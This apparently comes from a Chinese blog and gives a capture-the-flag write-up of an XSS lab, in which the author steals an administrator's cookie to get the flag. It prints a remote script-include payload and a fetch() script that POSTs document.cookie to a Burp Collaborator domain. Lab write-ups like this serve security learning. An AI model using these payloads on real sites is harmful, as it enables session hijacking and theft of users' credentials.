当前位置: 首页 > news >正文

道心网络安全学习笔记系列之好靶场的XSS靶场

各位师傅好,萌新我又来了,今天又开始打靶了,第一个靶场是《学Xss要会打Cookie》

打开以后是这个样子

这还不简单,js里获取cookie的命令时document.cookie,直接alert弹出,小easy.

我擦,并没有预想中弹出cookie,怎么回事?

查看提示,flag在cookie里,每30秒会检查一次,也就是要拿到cookie,需要注入xss代码,让后台管理员检查靶场时偷取它的cookie,而题目首页也说cookie在服务端,必须有个xss平台接收cookie。

这好办,先找个xss平台接收先,一搜,还挺多。

顺便找一个注册,然后配置一下,如何配置请自行搜索,实在不会的留言,这样,我们得到了一段形如<sCRiPt sRC=//xxxx.com/3XUtET></sCrIpT>的代码,我们写入文本框,等待30秒后接收。

结果接收的信息里根本就没有cookie,不知道是平台的问题还是网站的问题,换个网站要么要邀请码,要么打不开,自己搭个又懒得搭,只能换个方法获取cookie。

搜索了一圈,突然发现bp就有个功能模块可以获取临时域名接收cookie,打开bp,点击collaborator,在重发器后面的那个,点击复制到剪贴板,把临时域名复制下来,然后拼接以下代码

<script> fetch('http://临时域名', { method: 'POST', mode: 'no-cors', body: document.cookie }); </script>

把临时域名换成你刚刚复制的域名,然后把内容粘贴到靶场的输入框,然后点下面的立即轮询,

很快,请求包里就看到了网站发来的flag,直接过关。

http://www.cnnetsun.cn/news/1527287.html

相关文章:

  • 告别软件Delay!用STM32的TIM定时中断给蜂鸣器写个“滴滴”闹钟(代码可移植)
  • JSP + Servlet:构建动态Web应用的经典组合
  • 终极MP4视频修复指南:如何用untrunc工具拯救损坏的视频文件
  • OpenClaw任务编排术:GLM-4.7-Flash处理依赖关系
  • Simulink SIL测试实战:从模型到代码的等效性验证
  • 7天持续运行:OpenClaw+百川2-13B量化版资源占用监控报告
  • 胶囊网络实战:用TensorFlow 2.x从零搭建CapsNet(附MNIST代码)
  • 保姆级教程:用UniApp + DevEco Studio 4.0 从零打包上架一个鸿蒙应用(附全流程截图)
  • 别再只抄代码了!手把手教你给若依(RuoYi)系统加个带权限的自定义接口(附完整前后端配置)
  • Linux内核构建系统:Makefile与Kconfig解析
  • 避坑指南:Double DQN和Dueling DQN在TensorFlow 2.x中的5个常见实现错误
  • 解析 C++ 中的‘生存期保护’:利用生命周期注解规避 99% 的悬挂指针风险
  • AI学习课堂网站丨OPENMAIC丨清华团队开源项目
  • Semilimes SDK:面向MCU的轻量级安全物联网通信框架
  • 云上实战说 | TapNow x Google Cloud 带您体验从灵感到资产的秒级转化
  • 单片机存储器系统架构与工作原理详解
  • OpenClaw日程管理方案:Qwen3.5-9B解析邮件生成待办清单
  • Livox_ros_driver vs driver2:消息类型详解与ROS生态兼容性避坑指南
  • S32K FTM模块实战:从基础配置到电机控制应用
  • OpenClaw多终端控制方案:百川2-13B模型+飞书+网页端协同操作
  • 从零构建微程序控制模型机:运算器与存储器的协同实战
  • 安卓应用集成 FirebaseAuth 实现 Google 登录的完整指南
  • 2026搜索量暴涨!这几款配音软件火到刷屏
  • DeepChem:当AI遇见分子科学,如何重塑药物研发的底层逻辑
  • 医疗陪护管理系统:信息化管理在医院的应用
  • 2026年谷歌商店,谷歌三件套,Google play闪退,从根源排查到品牌适配解决方案
  • 新书速览|Excel+DeepSeek会计与财务高效办公
  • Display Driver Uninstaller深度清理实战指南
  • 嵌入式系统if/else代码优化与设计模式应用
  • 保姆级教程:在Ubuntu 20.04上从零搭建PX4无人机仿真环境(含ROS Noetic和QGC)